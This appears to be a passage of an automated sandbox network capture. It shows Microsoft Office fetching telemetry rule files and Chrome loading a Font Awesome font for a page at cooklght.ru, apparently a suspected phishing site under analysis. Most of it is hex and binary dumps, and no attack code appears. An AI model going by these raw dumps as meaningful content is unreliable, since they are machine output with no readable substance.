                                                                            2024-10-28 08:37:07 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            58192.168.2.44982613.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:06 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:07 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:06 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 472
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                            ETag: "0x8DC582B9DACDF62"
                                                                            x-ms-request-id: 8d7929b6-101e-0017-6edc-2647c7000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083706Z-17c5cb586f6wmhkn5q6fu8c5ss000000045g000000002w32
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:07 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            59192.168.2.44982813.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:06 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:07 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:06 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 404
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                            ETag: "0x8DC582B9E8EE0F3"
                                                                            x-ms-request-id: 1abafd92-601e-0070-072b-27a0c9000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083706Z-16849878b78tg5n42kspfr0x4800000004ug000000004scn
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            X-Cache-Info: L1_T2
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:07 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            60192.168.2.44982913.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:06 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:07 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:06 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 428
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                            ETag: "0x8DC582BAC4F34CA"
                                                                            x-ms-request-id: 6b700fd2-301e-005d-5b5a-26e448000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083706Z-r197bdfb6b48pl4k4a912hk2g400000003yg000000003xyx
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:07 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            61192.168.2.44982713.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:06 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:07 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:06 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 468
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                            ETag: "0x8DC582B9C8E04C8"
                                                                            x-ms-request-id: 227affc5-c01e-0046-7627-272db9000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083706Z-17c5cb586f6sqz6fff89etrx0800000004f00000000035cs
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:07 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            62192.168.2.449832104.17.25.144431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:07 UTC648OUTGET /ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2 HTTP/1.1
                                                                            Host: cdnjs.cloudflare.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            Origin: https://cooklght.ru
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: font
                                                                            Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:37:07 UTC979INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:07 GMT
                                                                            Content-Type: application/octet-stream; charset=utf-8
                                                                            Content-Length: 156532
                                                                            Connection: close
                                                                            Access-Control-Allow-Origin: *
                                                                            Cache-Control: public, max-age=30672000
                                                                            ETag: "656632a7-26374"
                                                                            Last-Modified: Tue, 28 Nov 2023 18:34:15 GMT
                                                                            cf-cdnjs-via: cfworker/kv
                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                            Timing-Allow-Origin: *
                                                                            X-Content-Type-Options: nosniff
                                                                            CF-Cache-Status: HIT
                                                                            Age: 314944
                                                                            Expires: Sat, 18 Oct 2025 08:37:07 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UsMuNm1ubsVzYJIHW4IRh66vQkGa%2B%2FalqQiatzhSE%2BeDKrhIR7b6u7PS9tCav9vGspviIvZa4ksZkmYWFN%2BD7KtfE2sVSZn6evQOrcAlZ7gMOpxUl8e0kyxkXauhaJBfp4OeTwoY"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                            Strict-Transport-Security: max-age=15780000
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d999a21bbe96c46-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-10-28 08:37:07 UTC390INData Raw: 77 4f 46 32 00 01 00 00 00 02 63 74 00 0a 00 00 00 06 1a 41 00 02 63 28 03 05 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 ab 3c 00 81 91 02 ca 96 c2 5c cb ab 40 05 87 6d 07 20 25 20 0d 93 95 01 50 58 9d 00 00 e8 fa 36 1e 46 a4 68 f6 f0 14 91 b3 5e 0f 80 aa aa aa aa aa 66 25 04 1c d7 b6 bd aa 2a 00 08 7e f4 93 9f fd e2 57 bf f9 dd 1f fe f4 17 7f f5 37 7f f7 0f ff f4 2f ff f6 1f ff f5 3f ff f7 9f 02 83 71 f7 0f 84 69 d9 8e cb ed f1 fa fc 86 ff 68 bf d7 73 27 40 b4 49 0a c2 f3 44 95 15 ca 56 d5 46 d8 29 28 56 b2 8a 60 fd 37 aa 42 07 df a7 f1 1f 75 e9 b3 ec 0b 00 4a a7 f3 fb 49 19 55 9c 80 39 45 de 11 60 4d b7 8e cd 5a 66 95 d1 c8 ff a9 98 52 0e 26 9a 74 26 26 d2 6a 8b 8a f9 cb 2d a2 95 24 d3 17 c0 22 3b a8 3a
                                                                            Data Ascii: wOF2ctAc(6$ `<\@m % PX6Fh^f%*~W7/?qihs'@IDVF)(V`7BuJIU9E`MZfR&t&&j-$";:
                                                                            2024-10-28 08:37:07 UTC1369INData Raw: 81 03 5e 20 c5 8d 55 c2 bf 25 8a 17 e1 93 b8 a8 45 20 f7 7f 09 70 7a 26 f8 13 4d ad be 5e 35 54 57 77 41 63 95 64 d9 96 ac b6 ba 1d 43 ac b2 a4 ee 84 95 8c e7 36 59 cc cd 12 79 89 b3 9c 65 dd 0c 2f 66 8e 50 0b c4 3a e2 1c b1 76 f7 00 ff 5f 42 e9 88 b4 d4 ba 7a 42 4f 4f cf f4 84 84 b0 00 06 98 05 66 37 63 76 16 98 bd db 3b de 5c de cb 60 3a ee 31 88 20 8f 62 48 5a 89 e2 91 22 45 11 54 24 45 85 35 69 45 cb 14 14 79 14 65 f9 94 29 d1 22 a1 10 6d cb f7 a6 43 7a 7b 9d f2 59 72 90 1c b0 ff 3f 69 6a fd bb af c2 ab 57 e1 55 48 08 0d a0 80 02 50 40 77 a3 1b d5 68 a0 3a b0 c9 22 d9 14 49 2b b0 ad 44 52 92 2d 28 51 94 e5 00 af 34 72 a0 03 e4 28 c9 bb 52 3b 48 43 67 38 d3 61 77 7b c6 49 b6 bc 63 38 c5 c3 99 2c 7b f7 7f 4c 96 35 89 93 82 aa 8f c8 52 ad ab 67 ba 7b ba
                                                                            Data Ascii: ^ U%E pz&M^5TWwAcdC6Yye/fP:v_BzBOOf7cv;\`:1 bHZ"ET$E5iEye)"mCz{Yr?ijWUHP@wh:"I+DR-(Q4r(R;HCg8aw{Ic8,{L5Rg{
                                                                            2024-10-28 08:37:07 UTC1369INData Raw: f8 bd b6 e6 f6 fb a4 c1 88 e9 33 59 ee 8b 7f cf 02 d3 43 9f b9 c6 d3 ca 8e d9 e7 d7 2d 3f 23 1b 04 ff aa 75 23 bb fa 69 5c 0b cf 77 f5 69 69 7c 4b c9 8e d6 75 ee 1c 67 63 5f 25 fa a9 be d9 e8 3e 35 3e cb ac d9 b3 c0 54 d9 b6 1c b3 d8 37 c1 33 02 7b 3f 13 ae c8 b7 75 89 75 b6 a5 ab ee 87 19 53 a6 8f ea d1 dd 9b 33 bd ef 8b c3 06 fc 41 e5 d1 b5 05 c8 91 77 bf b7 ca 19 18 6a 41 bc 07 23 b9 b3 64 ce 9d 85 ac 8e 06 dd 2c 8f 9f 9c ec ca 6d 7e b7 1a e7 69 03 bd d6 c0 0f 93 67 2a 98 36 5b 3d de 45 aa d9 e4 77 44 ff 52 ce a2 f6 b3 b7 a7 5d e6 eb 59 9b ab 26 f5 9e e1 d0 65 6b 78 71 6d 94 fa 52 f8 7b 3b e6 e3 71 52 a7 cc 87 96 ab a9 6f 23 be fd 59 d5 3c f6 fe 33 3e 49 cd 2b e5 5b 8f 13 6a 6a fc 5c a8 9a cd 79 34 03 b7 7f 81 e3 a0 47 2b 78 c5 ba 0d 9c c5 d7 9c f6 3e
                                                                            Data Ascii: 3YC-?#u#i\wii|Kugc_%>5>T73{?uuS3AwjA#d,m~ig*6[=EwDR]Y&ekxqmR{;qRo#Y<3>I+[jj\y4G+x>
                                                                            2024-10-28 08:37:07 UTC1369INData Raw: ed 0f fb d3 fe b6 ff 62 77 c2 fd e1 d5 b0 3a 7c 16 fe 0e ff 10 f4 e8 33 60 26 73 59 4a cd 28 2d 43 d6 62 1d d6 63 7d b6 60 4b b6 a7 63 47 0e e1 50 0e e3 70 8e e0 48 8e e7 04 56 71 31 97 70 39 57 72 15 57 73 0d d7 72 1d 37 71 2b 77 70 17 f7 f3 00 0f f2 10 0f f3 08 8f f2 18 8f f3 04 4f f2 14 2f f2 0e ef f2 31 9f f0 29 5f f0 25 5f f1 3b 7f f1 af 40 94 04 12 91 44 49 92 64 49 91 74 c9 94 2c c9 96 1c c9 95 3c 29 15 23 0d a5 b3 74 95 6e d2 43 fa 4a 3f e9 2f 03 65 9c 6c 91 ad b2 ad b2 49 65 d3 da a9 b5 8b 6b 97 d4 8e d5 ee 55 13 57 83 87 e8 26 8e 29 6d 06 98 09 66 91 59 62 36 9b 6d 66 9f 39 68 8e 9a 9b e6 91 79 69 9c e4 96 62 52 4a ea 48 5b e9 2c dd 65 a8 8c 97 99 b2 54 36 c9 2e 39 26 e7 e4 92 dc 95 fb f2 50 3e ca 17 f9 2e ff 6d 64 9b c6 66 b7 c5 ed 64 bb cc 1e
                                                                            Data Ascii: bw:|3`&sYJ(-Cbc}`KcGPpHVq1p9WrWsr7q+wpO/1)_%_;@DIdIt,<)#tnCJ?/elIekUW&)mfYb6mf9hyibRJH[,eT6.9&P>.mdfd
                                                                            2024-10-28 08:37:07 UTC1369INData Raw: 39 05 e7 e7 02 5c 84 8b 72 49 2e c5 55 b8 2a 2f e3 4d bc 9d f7 f2 31 3e c9 67 f9 12 df e2 07 fc 98 a9 1f e7 16 79 ec d9 25 8f 14 94 52 52 6e 55 cd a4 b5 74 90 ae d2 5d fa b0 a1 d1 32 4e 26 c9 14 99 25 2b 65 b5 6c 66 fc e4 dc ae 6d f5 41 42 b6 fc 29 6a 6f f2 1f f1 90 10 c9 e7 cc 8d 7c 28 88 72 5f a6 09 5a a2 2d 3a a2 0f fa 61 10 86 62 3c 26 63 1a 66 62 3e 96 b1 f1 9b b0 15 db b1 07 07 70 02 67 70 01 97 70 15 d7 71 07 f7 d9 ea 15 02 3d b3 5b b8 8b ea 62 f4 13 b9 a4 2e c5 bc f1 50 bc 3f f5 e7 ec 9f f3 e6 72 fc ef 6a fe 7f f8 ff 83 ff ef fc 7f e3 ff 6b f8 63 13 a6 40 e9 02 45 0b 14 8c df e2 fd 78 31 1e 8f c7 e2 8e b8 2d 6e 8d 9b e3 06 20 2e 8c b3 e3 8c 58 29 96 8e 25 62 9e 98 2e a6 f4 ff fd b3 bf f6 47 7e c3 cf f8 69 3f e0 3b 7d 9b 6f f2 8d be c1 57 f8 62 5f
                                                                            Data Ascii: 9\rI.U*/M1>gy%RRnUt]2N&%+elfmAB)jo|(r_Z-:ab<&cfb>pgppq=[b.P?rjkc@Ex1-n .X)%b.G~i?;}oWb_
                                                                            2024-10-28 08:37:07 UTC1369INData Raw: 73 8c cb b4 11 80 0d 0b b3 00 e3 43 7b f1 70 cf 22 0c 69 bf 79 6f 57 77 e9 2e 1c f2 43 a6 3f 5b 5a 83 b3 6a 52 78 3a 5a 87 7a 1c ff c4 b4 e3 c0 8e 01 3b 04 6c 2f 3c 4a df c3 15 dc 41 69 f5 e4 af 6b 43 38 89 8c 1a 34 a6 09 4d 69 46 73 5a d0 92 56 b4 a6 0d 6d 69 47 7b 3a d0 91 12 65 aa c8 a9 a6 42 50 d0 89 ce 74 a1 2b dd e8 4e 0f 7a 72 2d f7 d8 e5 76 85 5d 69 d7 d9 f5 76 93 dd 62 b7 da 5d 76 9f 3d 61 4f da 53 f6 96 bd 6f 1f d8 87 f6 91 7d 6c 9f d8 a7 f6 b9 7d 61 5f da 37 f6 ad 7d 67 3f d9 cf f6 8b fd 6a 7f da 0c 9b 63 8b 6c b1 ad b2 d5 42 35 d5 5c 2d d5 56 b9 ba ab 87 7a a9 bf 06 68 a0 86 6a b8 c6 6a 9c c6 6b 92 26 6b 8a a6 6a 5b 6d a7 1d b4 93 76 d5 b1 3a 59 a7 ea 0c 9d ad 0b 74 a1 2e d2 c5 ba 44 97 ea 32 5d ae eb 74 bd 6e d3 ed ba 57 8f e8 49 bd a9 77 f4
                                                                            Data Ascii: sC{p"iyoWw.C?[ZjRx:Zz;l/<JAikC84MiFsZVmiG{:eBPt+Nzr-v]ivb]v=aOSo}l}a_7}g?jclB5\-Vzhjjk&kj[mv:Yt.D2]tnWIw
                                                                            2024-10-28 08:37:07 UTC1369INData Raw: 4b 08 3b 50 af 05 3b 52 6f 0d 3b 51 ef 08 3b 53 ef 0a bb 50 1f bc 1c bb 52 1f 43 7d 6c ff ab ae 4f 77 39 f6 a0 be 88 fa e2 3e 57 5d df 20 ec 4d 7d 07 ec 43 fd 08 ec 4b fd 0c ec 47 fd 02 ec 4f fd 36 1c 40 fd 2e 1c 48 fd 3e 1c 44 fd 3d 1c 4c fd 33 1c 42 fd 1b 1c 4a fd 1f 1c 46 6f f0 08 0e a7 37 15 bd a9 71 04 bd 59 81 a3 e8 2d 0a 47 d3 3b 11 8e a1 77 09 1c 4b ef 7e 38 8e de c3 70 3c bd 67 e1 04 7a 2f 8d e0 44 7a af d2 7b 0d 27 d1 fb 02 38 85 de b7 70 2a 7d 93 c3 69 f4 dd 3e 82 d3 e9 bb 93 be bb 70 06 7d bf 02 67 d1 2c 02 67 d3 2c 3b 82 73 68 96 a7 59 01 e7 d2 ec 02 9c 4f b3 f7 57 74 01 cd 7e 34 fb e3 42 9a 83 68 0e c6 c5 34 67 00 97 d2 9c 03 97 d1 5c fb 15 5d 4e 73 03 cd ad b8 82 e6 76 9a 3b 70 1d cd dd 2c c7 0d 34 f7 d2 bc d2 cf fd 89 9a d7 68 3e c3 93 34
                                                                            Data Ascii: K;P;Ro;Q;SPRC}lOw9>W] M}CKGO6@.H>D=L3BJFo7qY-G;wK~8p<gz/Dz{'8p*}i>p}g,g,;shYOWt~4Bh4g\]Nsv;p,4h>4
                                                                            2024-10-28 08:37:07 UTC1369INData Raw: fa 07 79 d9 e8 25 b1 36 65 d3 88 58 87 b2 39 65 0b 62 5d ca 61 48 37 37 e5 f0 88 6e 1e ca d1 94 63 88 f5 29 a7 22 b1 21 e5 aa 82 d8 88 f2 30 e5 91 f1 58 5e 1e 53 62 53 ca 53 12 9b 51 9e 8b 88 cd 29 2f 51 5e 21 b6 a0 bc 86 c4 d6 94 8f 24 b6 a1 7c 2a b1 2d e5 2b 89 ed 28 3f 45 c4 f6 94 bf 28 7f 13 3b 50 fe 45 fa 33 29 ff 4b ec 44 1d 24 b1 33 75 54 89 5d a8 93 4b ec 4a 9d 52 62 37 ea 54 05 31 15 75 76 ea 9c 4f e7 f2 3a b7 05 b1 17 75 3e ea fc cf e0 f2 ba a0 12 fb 52 17 91 d8 8f ba 98 c4 fe d4 25 24 0e a0 2e 25 71 20 75 19 89 83 a8 2b 48 1c 4c 5d 59 e2 10 ea aa 12 87 52 d7 90 38 8c ba 6e 41 1c 4e dd 90 ba d1 b8 37 af 9b 18 11 47 51 37 a3 6e 4e 1c 4d dd 9a 92 71 2c 75 5b ea 4e c4 71 d4 5d a9 bb 13 a7 50 f7 24 22 4e a7 ee 43 dd 8f 38 83 7a 10 05 dd 42 d4 83 a9
                                                                            Data Ascii: y%6eX9eb]aH77nc)"!0X^SbSSQ)/Q^!$|*-+(?E(;PE3)KD$3uT]KJRb7T1uvO:u>R%$.%q u+HL]YR8nAN7GQ7nNMq,u[Nq]P$"NC8zB
                                                                            2024-10-28 08:37:07 UTC1369INData Raw: d4 26 e6 7c 14 1a 13 db 11 85 16 c4 65 14 5a 12 57 a0 d0 9a 78 8f 42 1b e2 4b a0 d0 9e f8 51 28 74 26 f6 01 14 ba 10 73 0b 0a 3d 88 1f 87 c2 58 a2 7f 50 98 40 dc 01 14 26 7a 3c ac 92 f8 d1 28 ac 21 ae 1e 0a db 88 ed 87 c2 4e 62 1f 47 61 17 71 dd 50 38 9c e8 63 14 8e 20 e6 55 14 ce 24 e6 4a 14 ce 25 f6 3e 14 ce 27 76 09 0a 97 10 9d 84 c2 a5 c4 ec 40 e1 5a a2 cb 51 b8 8e d8 3f 51 b8 99 b8 f3 51 b8 83 d8 4f 51 b8 9b e8 58 14 1e 23 76 1b 0a 8f 13 33 0b 85 27 88 ef 8c c2 93 c4 7d 87 c2 d3 c4 cd 46 e1 19 a2 bf 50 78 8e d8 83 28 bc 40 dc 36 14 5e 26 e6 13 14 5e 23 f6 68 14 de 24 f6 28 14 de 22 ee 2b 14 de 21 6e 37 0a ef 13 77 39 0a 1f 12 77 3b 0a 9f 11 9d 8b c2 17 c4 5c 83 c2 d7 c4 f4 47 e1 3b e2 c6 a1 f0 23 71 06 85 48 74 19 0a 87 88 ae 45 d1 11 f7 3a 8a a5 88
                                                                            Data Ascii: &|eZWxBKQ(t&s=XP@&z<(!NbGaqP8c U$J%>'v@ZQ?QQOQX#v3'}FPx(@6^&^#h$("+!n7w9w;\G;#qHtE:
